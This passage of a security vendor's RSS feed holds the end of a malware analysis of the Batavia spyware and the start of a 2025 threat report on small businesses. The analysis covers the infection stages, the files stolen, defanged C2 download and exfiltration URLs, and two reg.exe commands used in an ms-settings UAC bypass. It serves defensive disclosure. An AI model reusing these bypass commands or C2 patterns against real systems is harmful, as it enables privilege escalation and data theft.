  474. <td>Value</td>
  475. <td>Description</td>
  476. </tr>
  477. <tr>
  478. <td>1</td>
  479. <td><code>\WebView.exe</code></td>
  480. <td>Filename to save</td>
  481. </tr>
  482. <tr>
  483. <td>2</td>
  484. <td><code>Select * from Win32_OperatingSystem</code></td>
  485. <td>Query to determine OS version and build number</td>
  486. </tr>
  487. <tr>
  488. <td>3</td>
  489. <td><code>Windows 11</code></td>
  490. <td>OS version required for further execution</td>
  491. </tr>
  492. <tr>
  493. <td>4</td>
  494. <td><code>new:c08afd90-f2a1-11d1-8455-00a0c91f3880</code></td>
  495. <td><code>ShellBrowserWindow</code> object ID, used to open the downloaded file via the <code>Navigate()</code> method</td>
  496. </tr>
  497. <tr>
  498. <td>5</td>
  499. <td><code>new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B</code></td>
  500. <td><code>WScript.Shell</code> object ID,<br />
  501. used to run the file via the <code>Run()</code> method</td>
  502. </tr>
  503. <tr>
  504. <td>6</td>
  505. <td><code>winmgmts:\\.\root\cimv2</code></td>
  506. <td>WMI path used to retrieve OS version and build number</td>
  507. </tr>
  508. <tr>
  509. <td>7</td>
  510. <td><code>77;90;80;0</code></td>
  511. <td>First bytes of the downloaded file</td>
  512. </tr>
  513. <tr>
  514. <td>8</td>
  515. <td><code>&amp;dd=d</code></td>
  516. <td>Additional URL arguments for file download</td>
  517. </tr>
  518. <tr>
  519. <td>9</td>
  520. <td><code>&amp;i=s</code></td>
  521. <td>Additional URL arguments for sending downloaded file size</td>
  522. </tr>
  523. <tr>
  524. <td>10</td>
  525. <td><code>&amp;i=b</code></td>
  526. <td>Additional URL arguments for sending OS build number</td>
  527. </tr>
  528. <tr>
  529. <td>11</td>
  530. <td><code>&amp;i=re</code></td>
  531. <td>Additional URL arguments for sending error information</td>
  532. </tr>
  533. <tr>
  534. <td>12</td>
  535. <td><code>\winws.txt</code></td>
  536. <td>Empty file that will also be created on the device</td>
  537. </tr>
  538. </tbody>
  539. </table>
  540. <p>By accessing the address <code><strong>https://oblast-ru[.]com/oblast_download/?file=hc1-[redacted]</strong>&amp;dd=d</code>, the script downloads the file <code>WebView.exe</code> (MD5: 5CFA142D1B912F31C9F761DDEFB3C288) and saves it to the <code>%TEMP%</code> directory, then executes it. If the OS version cannot be retrieved or does not match the one obtained from the C2 server, the downloader uses the <code>Navigate()</code> method; otherwise, it uses <code>Run()</code>.</p>
  541. <h2 id="second-stage-of-infection-webview-exe">Second stage of infection: WebView.exe</h2>
  542. <p><code>WebView.exe</code> is an executable file written in Delphi, with a size of 3,235,328 bytes. When launched, the malware downloads content from the link <code><strong>https://oblast-ru[.]com/oblast_download/?file=</strong>1<strong>hc1-[redacted]&amp;view</strong></code> and saves it to the directory <code>C:\Users[username]\AppData\Local\Temp\WebView</code>, after which it displays the downloaded content in its window. At the time of analysis, the link was no longer active, but we assume it originally hosted the fake contract mentioned in the malicious email.</p>
  543. <p>At the same time as displaying the window, the malware begins collecting information from the infected computer and sends it to an address with a different domain, but the same infection ID: <code><strong>https://ru-exchange[.]com/mexchange/?file=</strong>1<strong>hc1-[redacted]</strong></code>. The only difference from the ID used in the VBS script is the addition of the digit 1 at the beginning of the argument, which may indicate the next stage of infection.</p>
  544. <p>The spyware collects several types of files, including various system logs and office documents found on the computer and removable media. Additionally, the malicious module periodically takes screenshots, which are also sent to the C2 server. To avoid sending the same files repeatedly, the malware creates a file named <code>h12</code> in the <code>%TEMP%</code> directory and writes a 4-byte FNV-1a_32 hash of the first 40,000 bytes of each uploaded file. If the hash of any subsequent file matches a value in h12, that file is not sent again.</p>
  545. <table>
  546. <tbody>
  547. <tr>
  548. <td>Type</td>
  549. <td>Full path or mask</td>
  550. </tr>
  551. <tr>
  552. <td>Pending file rename operations log</td>
  553. <td>c:\windows\pfro.log</td>
  554. </tr>
  555. <tr>
  556. <td>Driver install and update log</td>
  557. <td>c:\windows\inf\setupapi.dev.log</td>
  558. </tr>
  559. <tr>
  560. <td>System driver and OS component install log</td>
  561. <td>c:\windows\inf\setupapi.setup.log</td>
  562. </tr>
  563. <tr>
  564. <td>Programs list</td>
  565. <td>Directory listing of c:\program files*</td>
  566. </tr>
  567. <tr>
  568. <td>Office documents</td>
  569. <td>*.doc, *.docx, *.ods, *.odt, *.pdf, *.xls, *.xlsx</td>
  570. </tr>
  571. </tbody>
  572. </table>
  573. <p>In addition, <code>WebView.exe</code> downloads the next-stage executable from <code><strong>https://oblast-ru[.]com/oblast_download/?file=</strong>1<strong>hc1-[redacted]</strong>&amp;de</code> and saves it to <code>%PROGRAMDATA%\jre_22.3\javav.exe</code>. To execute this file, the malware creates a shortcut in the system startup folder: <code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\Jre22.3.lnk</code>. This shortcut is triggered upon the first device reboot after infection, initiating the next stage of malicious activity.</p>
  574. <h2 id="third-stage-of-infection-javav-exe">Third stage of infection: javav.exe</h2>
  575. <p>The executable file <code>javav.exe</code> (MD5: 03B728A6F6AAB25A65F189857580E0BD) is written in C++, unlike <code>WebView.exe</code>. The malicious capabilities of the two files are largely similar; however, <code>javav.exe</code> includes several new functions.</p>
  576. <p>For example, <code>javav.exe</code> collects files using the same masks as <code>WebView.exe</code>, but the list of targeted file extensions is expanded to include these formats:</p>
  577. <ul>
  578. <li>Image and vector graphic: *.jpeg, *.jpg, *.cdr</li>
  579. <li>Spreadsheets: *.csv</li>
  580. <li>Emails: *.eml</li>
  581. <li>Presentations: *.ppt, *.pptx, *.odp</li>
  582. <li>Archives: *.rar, *.zip</li>
  583. <li>Other text documents: *.rtf, *.txt</li>
  584. </ul>
  585. <p>Like its predecessor, the third-stage module compares the hash sums of the obtained files to the contents of the <code>h12</code> file. The newly collected data is sent to <code><strong>https://ru-exchange[.]com/mexchange/?file=</strong>2<strong>hc1-[redacted]</strong></code>.<br />
  586. Note that at this stage, the digit 2 has been added to the infection ID.</p>
  587. <p>Additionally, two new commands appear in the malware&#8217;s code: <code>set</code> to change the C2 server and <code>exa/exb</code> to download and execute additional files.</p>
  588. <p>In a separate thread, the malware regularly sends requests to <code><strong>https://ru-exchange[.]com/mexchange/?</strong>set<strong>&amp;file=</strong>2<strong>hc1-[redacted]&amp;data=[xxxx]</strong></code>, where <code>[xxxx]</code> is a randomly generated 4-character string. In response, javav.exe receives a new C2 address, encrypted with a 232-byte XOR key, which is saved to a file named <code>settrn.txt</code>.</p>
  589. <p>In another thread, the malware periodically connects to <code><strong>https://ru-exchange[.]com/mexchange/?</strong>exa<strong>&amp;file=</strong>2<strong>hc1-[redacted]&amp;data=[xxxx]</strong></code> (where <code>[xxxx]</code> is also a string of four random characters). The server responds with a binary executable file, encrypted using a one-byte XOR key <code>7A</code> and encoded using Base64. After decoding and decryption, the file is saved as <code>%TEMP%\windowsmsg.exe</code>. In addition to this, <code>javav.exe</code> sends requests to <code><strong>https://ru-exchange[.]com/mexchange/?</strong>exb<strong>&amp;file=</strong>2<strong>hc1-[redacted]&amp;data=[xxxx]</strong></code>, asking for a command-line argument to pass to <code>windowsmsg.exe</code>.</p>
  590. <p>To launch <code>windowsmsg.exe</code>, the malware uses a UAC bypass technique (<a href="https://attack.mitre.org/techniques/T1548/002/" target="_blank" rel="noopener">T1548.002</a>) involving the built-in Windows utility <code>computerdefaults.exe</code>, along with modification of two registry keys using the reg.exe utility.</p><pre class="urvanov-syntax-highlighter-plain-tag">add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f</pre><p>
  591. </p><pre class="urvanov-syntax-highlighter-plain-tag">add HKCU\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "%temp%\windowsmsg.exe &lt;arg&gt;"</pre><p>
  592. At the time of analysis, downloading <code>windowsmsg.exe</code> from the C2 server was no longer possible. However, we assume that this file serves as the payload for the next stage – most likely containing additional malicious functionality.</p>
  593. <h2 id="victims">Victims</h2>
  594. <p>The victims of the Batavia spyware campaign were Russian industrial enterprises. According to our telemetry data, more than 100 users across several dozen organizations received the bait emails.</p>
  595. <div class="js-infogram-embed" data-id="_/AlxpAhyVZESH3D7u5m8i" data-type="interactive" data-title="02-EN-Batavia graphics" style="min-height:;"></div>
  596. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of infections via VBS scripts, August 2024 – June 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/04223519/batavia-spyware3.png" target="_blank" rel="noopener">download</a>)</em></p>
  597. <h2 id="conclusion">Conclusion</h2>
  598. <p>Batavia is a new spyware that emerged in July 2024, targeting organizations in Russia. It spreads through malicious emails: by clicking a link disguised as an official document, unsuspecting users download a script that initiates a three-stage infection process on their device. As a result of the attack, Batavia exfiltrates the victim&#8217;s documents, as well as information such as a list of installed programs, drivers, and operating system components.</p>
  599. <p>To avoid falling victim to such attacks, organizations must take a comprehensive approach to infrastructure protection, employing a suite of security tools that include threat hunting, incident detection, and response capabilities. <a href="https://www.kaspersky.com/enterprise-security/xdr/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___xdr____ce00c376fedd13b4" target="_blank" rel="noopener">Kaspersky Next XDR Expert</a> is a solution for organizations of all sizes that enables flexible, effective workplace security. It&#8217;s also worth noting that the initial infection vector in this campaign is bait emails. This highlights the importance of regular employee training and raising awareness of corporate cybersecurity practices. We recommend specialized courses available on the <a href="https://www.kaspersky.com/small-to-medium-business-security/security-awareness-platform/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kasap____44cd4ba77be48d65" target="_blank" rel="noopener">Kaspersky Automated Security Awareness Platform</a>, which help reduce employees&#8217; susceptibility to email-based cyberattacks.</p>
  600. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  601. <p><strong>Hashes of malicious files</strong><br />
  602. Договор-2025-2.vbe<br />
  603. <a href="https://opentip.kaspersky.com/2963fb4980127adb7e045a0f743ead05/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ba8d7aea9ea7311d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2963FB4980127ADB7E045A0F743EAD05</a><br />
  604. webview.exe<br />
  605. <a href="https://opentip.kaspersky.com/5cfa142d1b912f31c9f761ddefb3c288/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______70eaa5d495fab437&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5CFA142D1B912F31C9F761DDEFB3C288</a><br />
  606. javav.exe<br />
  607. <a href="https://opentip.kaspersky.com/03b728a6f6aab25a65f189857580e0bd/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d17d6573529f1af3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">03B728A6F6AAB25A65F189857580E0BD</a></p>
  608. <p><strong>C2 addresses</strong><br />
  609. <a href="https://opentip.kaspersky.com/oblast-ru.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1b0188aa2ca1241e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">oblast-ru[.]com</a><br />
  610. <a href="https://opentip.kaspersky.com/ru-exchange.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5d424599e89e3523&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ru-exchange[.]com</a></p>
  611. ]]></content:encoded>
  613. <wfw:commentRss>https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/feed/</wfw:commentRss>
  614. <slash:comments>0</slash:comments>
  617. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  618. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  619. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  620. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/07093411/batavia-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  621. </item>
  622. <item>
  623. <title>AI and collaboration tools: how cyberattackers are targeting SMBs in 2025</title>
  624. <link>https://securelist.com/smb-threat-report-2025/116830/</link>
  625. <comments>https://securelist.com/smb-threat-report-2025/116830/#respond</comments>
  627. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  628. <pubDate>Wed, 25 Jun 2025 10:00:12 +0000</pubDate>
  629. <category><![CDATA[Research]]></category>
  630. <category><![CDATA[Adware]]></category>
  631. <category><![CDATA[Malware Statistics]]></category>
  632. <category><![CDATA[Spam Letters]]></category>
  633. <category><![CDATA[Phishing]]></category>
  634. <category><![CDATA[Malware]]></category>
  635. <category><![CDATA[Trojan]]></category>
  636. <category><![CDATA[Phishing websites]]></category>
  637. <category><![CDATA[Small and medium-sized business]]></category>
  638. <category><![CDATA[Spam and Phishing]]></category>
  639. <category><![CDATA[Financial threats]]></category>
  640. <category><![CDATA[Potentially Unwanted Applications]]></category>
  641. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116830</guid>
  642.  
  643. <description><![CDATA[In its annual SMB threat report, Kaspersky shares insights into trends and statistics on malware, phishing, scams, and other threats to small and medium-sized businesses, as well as security tips.]]></description>
  644. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Cyberattackers often view small and medium-sized businesses (SMBs) as easier targets, assuming their security measures are less robust than those of larger enterprises. In fact, attacks through contractors, also known as <a href="https://securelist.com/trusted-relationship-attack/112731/" target="_blank" rel="noopener"><em>trusted relationship</em> attacks</a>, remain one of the top three methods used to breach corporate networks. With SMBs generally being less protected than large enterprises, this makes them especially attractive to both opportunistic cybercriminals and sophisticated threat actors.</p>
  645. <p>At the same time, AI-driven attacks are becoming increasingly common, making phishing and malware campaigns easier to prepare and quickly adapt, thus increasing their scale. Meanwhile, cybersecurity regulations are tightening, adding more compliance pressure on SMBs.</p>
  646. <p>Improving your security posture has never been more critical. Kaspersky highlights key attack vectors every SMB should be aware of to stay protected.</p>
  647. <h2 id="how-malware-and-potentially-unwanted-applications-puas-are-disguised-as-popular-services">How malware and potentially unwanted applications (PUAs) are disguised as popular services</h2>
  648. <p>Kaspersky analysts have used data from the Kaspersky Security Network (KSN) to explore how frequently malicious and unwanted files and programs are disguised as legitimate applications commonly used by SMBs. The KSN is a system for processing anonymized cyberthreat-related data shared voluntarily by opted-in Kaspersky users. For this research, only data received from the users of Kaspersky solutions for SMBs were analyzed. The research focused on the following applications:</p>
  649. <ul>
  650. <li>ChatGPT</li>
  651. <li>Cisco AnyConnect</li>
  652. <li>Google Drive</li>
  653. <li>Google Meet</li>
  654. <li>DeepSeek</li>
  655. <li>Microsoft Excel</li>
  656. <li>Microsoft Outlook</li>
  657. <li>Microsoft PowerPoint</li>
  658. <li>Microsoft Teams</li>
  659. <li>Microsoft Word</li>
  660. <li>Salesforce</li>
  661. <li>Zoom</li>
  662. </ul>
  663. <p>Between January and April 2025 alone, nearly 8,500 SMB users encountered cyberattacks in which malware or PUAs were disguised as these popular tools.</p>
  664. <p>Among the detected threats, the highest number (1652) of unique malicious and potentially unwanted files mimicked Zoom, the widely used video conferencing platform. This accounted for nearly 41% of all unique files detected, a 14-percentage point increase compared to 2024. Microsoft Office applications remained frequent targets for impersonation: Outlook and PowerPoint each accounted for 16%, Excel for nearly 12%, while Word and Teams made up 9% and 5%, respectively.</p>
  665. <div class="js-infogram-embed" data-id="_/FLO2W3ILcE0BnbH96qOL" data-type="interactive" data-title="01-EN-SMB report graphs" style="min-height:;"></div>
  666. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share of unique files with names mimicking the nine most popular legitimate applications in 2024 and 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24234859/01-EN-SMB-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  667. <p>A comparison of the threat landscape in 2024 and 2025 reveals a clear shift: with the growing popularity of AI services, cyberattackers are increasingly disguising malware as various AI tools. According to our analysis, the number of unique malicious files mimicking ChatGPT grew by 115%, reaching 177 in the first four months of 2025. This contributed to a three-percentage-point increase in the tool&#8217;s share among the most mimicked applications. DeepSeek, a large language model launched only in 2025, has immediately appeared on the list of impersonated tools.</p>
  668. <p>Another cybercriminal tactic to watch for in 2025 is the growing use of collaboration platform brands to trick users into downloading or launching malware and PUAs. As mentioned above, the share of threats disguised as Zoom increased by 14 percentage points, reaching 1652 unique files, while Microsoft Teams and Google Drive saw increases of over three and one percentage points, respectively, with 206 and 132 cases. This pattern likely reflects the normalization of remote work and geographically distributed teams, which has made these platforms integral to business operations across industries.</p>
  669. <p>Attackers are clearly leveraging the popularity and credibility of these services to increase the success rate of their campaigns.</p>
  670. <table>
  671. <tbody>
  672. <tr>
  673. <td><strong>Malicious file names mimicking popular services </strong></td>
  674. <td><strong>2024</strong></td>
  675. <td><strong>2025</strong></td>
  676. <td>2025 vs 2024</td>
  677. </tr>
  678. <tr>
  679. <td>Zoom</td>
  680. <td>26.24%</td>
  681. <td>40.86%</td>
  682. <td>14.62 p.p.</td>
  683. </tr>
  684. <tr>
  685. <td>Microsoft Teams</td>
  686. <td>1.84%</td>
  687. <td>5.10%</td>
  688. <td>3.25 p.p.</td>
  689. </tr>
  690. <tr>
  691. <td>ChatGPT</td>
  692. <td>1.47%</td>
  693. <td>4.38%</td>
  694. <td>2.9 p.p.</td>
  695. </tr>
  696. <tr>
  697. <td>DeepSeek</td>
  698. <td>0</td>
  699. <td>2.05%</td>
  700. <td>&#8211;</td>
  701. </tr>
  702. <tr>
  703. <td>Google Drive</td>
  704. <td>2.11%</td>
  705. <td>3.26%</td>
  706. <td>1.15 p.p.</td>
  707. </tr>
  708. </tbody>
  709. </table>
  710. <p>The total number of unique malicious and unwanted files imitating legitimate applications slightly declined year-over-year, from 5,587 in 2024 to 4,043 in 2025.</p>
  711. <div class="js-infogram-embed" data-id="_/VRiKRd9ttz1j39ETbFvA" data-type="interactive" data-title="02-EN-SMB report graphs" style="min-height:;"></div>
  712. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Main types of threats affecting the SMB Sector, 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235226/02-EN-SMB-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  713. <p>The top threats targeting SMBs in 2025 included downloaders, Trojans, and adware.</p>
  714. <p>Leading the list are <strong>downloaders</strong>, potentially unwanted applications designed to install additional content from the internet, often without clearly informing the user of what&#8217;s being downloaded. While not inherently malicious, these tools are frequently exploited by attackers to deliver harmful payloads to victims&#8217; devices.</p>
  715. <p><strong>Trojans</strong> ranked next. These are malicious programs that carry out unauthorized actions such as deleting, blocking, modifying, or copying data, or disrupting the normal operation of computers and networks. Trojans are among the most prevalent forms of malware, and cyberattackers continue to use them in a wide range of malicious campaigns.</p>
  716. <p>Adware also made the top three list. These programs are designed to display advertisements on infected computers or substitute a promotional website for the default search engine in a browser. Adware often comes bundled with freeware or shareware, effectively serving as the price for using the free software. In some cases, Trojans silently download and install adware onto the victim&#8217;s machine.</p>
  717. <p>Among other common types of threats were DangerousObject, Trojan-Dropper, Backdoor, Trojan-Downloader, HackTool, Trojan-PSW, and PSW-Tool. For instance, we recently identified a campaign involving a Trojan-Downloader called &#8220;<a href="https://securelist.com/tookps/116019/" target="_blank" rel="noopener">TookPS</a>&#8220;, which was distributed through fake websites imitating legitimate remote access and 3D modeling software.</p>
  718. <h2 id="how-scammers-and-phishers-trick-victims-into-giving-up-accounts-and-money">How scammers and phishers trick victims into giving up accounts and money</h2>
  719. <p>We continue to observe a wide range of phishing campaigns and scams targeting SMBs. Attackers aim to steal login credentials for various services, from delivery platforms to banking systems, or manipulate victims into sending them money.</p>
  720. <p>To do this, cyberattackers use a variety of lures, often imitating landing pages from brands commonly used by SMBs. One example is a phishing attempt targeting Google business accounts. The bait lures victims with the promise of promoting their company on X. It requires them to first log in to a dedicated platform using their Google account with credentials that will end up in cyberattackers&#8217; hands.</p>
  721. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116837" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3.png" alt="" width="1307" height="1090" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3.png 1307w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-300x250.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-1024x854.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-768x640.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-420x350.png 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-740x617.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-336x280.png 336w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235324/smb-threat-report3-800x667.png 800w" sizes="auto, (max-width: 1307px) 100vw, 1307px" /></a></p>
  722. <p>Another fake landing page impersonated a bank that offered business loans: a &#8220;Global Trust Bank&#8221;. Since legitimate organizations with that name exist in multiple countries, this phishing attempt may have seemed believable. The attackers tried to lure users with favorable business loan terms – but only after victims submitted their online banking credentials, giving the criminals access to their accounts.</p>
  723. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116838" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4.jpg" alt="" width="1280" height="960" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4.jpg 1280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-300x225.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-1024x768.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-768x576.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-200x150.jpg 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-467x350.jpg 467w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-740x555.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-373x280.jpg 373w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235355/smb-threat-report4-800x600.jpg 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></a></p>
  724. <p>We also saw a range of phishing emails targeting SMBs. In one recent case detected by our systems, the attacker sent a fake notification allegedly from DocuSign, an electronic document-signing service.</p>
  725. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116839" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5.png" alt="" width="1349" height="976" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5.png 1349w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-300x217.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-1024x741.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-768x556.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-484x350.png 484w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-740x535.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-387x280.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235432/smb-threat-report5-800x579.png 800w" sizes="auto, (max-width: 1349px) 100vw, 1349px" /></a></p>
  726. <p>SMBs can even find themselves targeted by classic Nigerian scams. In one recent example, the sender claimed to represent a wealthy client from Turkey who wanted to move $33 million abroad to allegedly avoid sanctions, and invited the recipient to handle the funds. In Nigerian scams, fraudsters typically cajole money. They may later request a relatively small payment to a manager or lawyer compared to the amount originally promised.</p>
  727. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116840" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6.png" alt="" width="1436" height="285" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6.png 1436w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-300x60.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-1024x203.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-768x152.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-740x147.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-1411x280.png 1411w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235511/smb-threat-report6-800x159.png 800w" sizes="auto, (max-width: 1436px) 100vw, 1436px" /></a></p>
  728. <p>Beyond these threats, SMBs are bombarded daily with hundreds of spam emails. Some promise attractive deals on email marketing or loans; others offer services like reputation management, content creation, or lead generation. In general, these offers are crafted to reflect the typical needs of small businesses. Not surprisingly, AI has also made its way into the spam folder – with offers to automate various business processes.</p>
  729. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116841" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7.png" alt="" width="1856" height="936" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7.png 1856w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-300x151.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-1024x516.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-768x387.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-1536x775.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-694x350.png 694w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-740x373.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-555x280.png 555w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235613/smb-threat-report7-800x403.png 800w" sizes="auto, (max-width: 1856px) 100vw, 1856px" /></a></p>
  730. <p>We have also seen spammers offering dubious deals like purchasing a database of over 400,000 businesses for $100, supposedly to be used for selling the company&#8217;s B2B products, or manipulating reviews on a review platform.</p>
